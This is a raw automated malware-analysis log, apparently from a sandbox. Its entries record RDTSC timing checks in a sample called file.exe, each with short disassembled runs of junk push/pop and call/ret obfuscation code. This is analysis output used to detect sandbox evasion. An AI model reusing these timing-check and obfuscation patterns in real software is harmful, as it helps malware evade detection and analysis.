                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6CA3 second address: 6B6CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1C64 second address: 6C1C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1C6A second address: 6C1C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1DB3 second address: 6C1DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1DB7 second address: 6C1DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA43130E31Ch 0x0000000c push esi 0x0000000d jmp 00007FA43130E31Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1F33 second address: 6C1F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1F39 second address: 6C1F67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 jmp 00007FA43130E327h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FA43130E32Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C251B second address: 6C251F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C251F second address: 6C2537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA43130E320h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2537 second address: 6C254D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA430E679EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C254D second address: 6C2551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2551 second address: 6C2555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2555 second address: 6C2565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FA43130E32Ah 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5B5F second address: 6C5B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5B63 second address: 6C5B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5B67 second address: 6C5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5B78 second address: 6C5BAD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA43130E323h 0x0000000f popad 0x00000010 nop 0x00000011 mov ch, B4h 0x00000013 push 00000000h 0x00000015 movsx edx, ax 0x00000018 push BFC2319Bh 0x0000001d jl 00007FA43130E324h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5BAD second address: 6C5BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5BB1 second address: 6C5C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 403DCEE5h 0x0000000d jnl 00007FA43130E323h 0x00000013 jmp 00007FA43130E321h 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FA43130E318h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 xor edi, dword ptr [ebp+122D2B44h] 0x0000003c push 00000003h 0x0000003e xor ch, 00000021h 0x00000041 push 8EB0279Ah 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FA43130E327h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5C30 second address: 6C5C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jns 00007FA430E679E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 4EB0279Ah 0x00000015 mov dword ptr [ebp+122D1ADAh], ebx 0x0000001b jmp 00007FA430E679F1h 0x00000020 lea ebx, dword ptr [ebp+124579A3h] 0x00000026 xor dword ptr [ebp+122D3320h], edx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5C6F second address: 6C5C75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5DB6 second address: 6C5E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007FA430E679EEh 0x00000011 nop 0x00000012 movzx ecx, cx 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D307Eh] 0x0000001d jmp 00007FA430E679F0h 0x00000022 push 63AA7104h 0x00000027 jng 00007FA430E679FAh 0x0000002d jmp 00007FA430E679F4h 0x00000032 xor dword ptr [esp], 63AA7184h 0x00000039 add dx, 2A45h 0x0000003e mov edi, 065318F9h 0x00000043 push 00000003h 0x00000045 mov edi, eax 0x00000047 push 00000000h 0x00000049 cmc 0x0000004a pushad 0x0000004b mov ecx, dword ptr [ebp+122D2CD0h] 0x00000051 call 00007FA430E679ECh 0x00000056 call 00007FA430E679F7h 0x0000005b pop edx 0x0000005c pop ebx 0x0000005d popad 0x0000005e push 00000003h 0x00000060 mov dword ptr [ebp+122D1A63h], edi 0x00000066 push FA92E84Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E61 second address: 6C5E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E67 second address: 6C5E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E6C second address: 6C5E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E72 second address: 6C5E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E76 second address: 6C5EB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 3A92E84Ch 0x0000000f mov edi, dword ptr [ebp+122D2A80h] 0x00000015 lea ebx, dword ptr [ebp+124579B7h] 0x0000001b or di, 49BFh 0x00000020 push edx 0x00000021 pushad 0x00000022 jp 00007FA43130E316h 0x00000028 mov eax, dword ptr [ebp+122D2A80h] 0x0000002e popad 0x0000002f pop edi 0x00000030 push eax 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FA43130E31Eh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5EB8 second address: 6C5EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E694B second address: 6E6978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Bh 0x00000009 popad 0x0000000a jmp 00007FA43130E327h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6978 second address: 6E697C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E495B second address: 6E495F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4BF3 second address: 6E4BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4E7D second address: 6E4E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E526F second address: 6E5288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA430E679E6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FA430E679EBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5288 second address: 6E529F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FA43130E316h 0x00000011 jo 00007FA43130E316h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5578 second address: 6E558F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA430E679EBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E558F second address: 6E55A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FA43130E321h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E55A5 second address: 6E55AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE7A4 second address: 6AE7AE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE7AE second address: 6AE7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE7B6 second address: 6AE7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5FDA second address: 6E5FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5FE0 second address: 6E5FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6123 second address: 6E6131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6131 second address: 6E6140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FA43130E31Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ECE46 second address: 6ECE57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ECE57 second address: 6ECE5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBDA7 second address: 6BBDAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B1E second address: 6F0B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F42D6 second address: 6F42E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F46D4 second address: 6F46DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F52AE second address: 6F533C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA430E679E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FA430E679F0h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jnl 00007FA430E679F0h 0x0000001b nop 0x0000001c mov esi, dword ptr [ebp+122D2C84h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007FA430E679E8h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D3320h], ebx 0x00000044 xor dword ptr [ebp+122D2EBAh], eax 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122D3023h], esi 0x00000052 movsx esi, cx 0x00000055 push eax 0x00000056 pushad 0x00000057 pushad 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a jmp 00007FA430E679F8h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F533C second address: 6F5340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5CF5 second address: 6F5CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5B97 second address: 6F5BA8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F77A0 second address: 6F7810 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA430E679F1h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FA430E679E8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 add dword ptr [ebp+122D3320h], ebx 0x0000002e push 00000000h 0x00000030 mov esi, edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FA430E679E8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnl 00007FA430E679E8h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F82EA second address: 6F82F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F82F0 second address: 6F82F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F82F4 second address: 6F8311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA43130E322h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F802F second address: 6F8034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA1D8 second address: 6FA1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA1DC second address: 6FA1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA1E2 second address: 6FA1FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA43130E31Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA341 second address: 6BA345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA345 second address: 6BA35B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA43130E316h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA43130E31Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE3BD second address: 6FE3CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE3CE second address: 6FE3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE3E9 second address: 6FE3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70333A second address: 70334F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70334F second address: 703356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7044C3 second address: 7044CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF601 second address: 6FF606 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700591 second address: 7005A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF693 second address: 6FF69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF69E second address: 6FF6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7035B6 second address: 7035BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70859D second address: 7085BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FA43130E316h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA43130E323h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7085BF second address: 708626 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA430E679E8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 pushad 0x00000027 jmp 00007FA430E679F4h 0x0000002c mov dx, BE67h 0x00000030 popad 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D3291h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA430E679F0h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708626 second address: 708630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA43130E316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7077AA second address: 7077AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70589F second address: 7058B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7095D0 second address: 7095F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov bx, di 0x00000009 mov dword ptr [ebp+122D1A2Ah], edx 0x0000000f push 00000000h 0x00000011 mov bx, di 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 add ebx, 2F924197h 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push ebx 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 708771 second address: 708775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B573 second address: 70B579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B579 second address: 70B57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B57F second address: 70B585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B585 second address: 70B589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
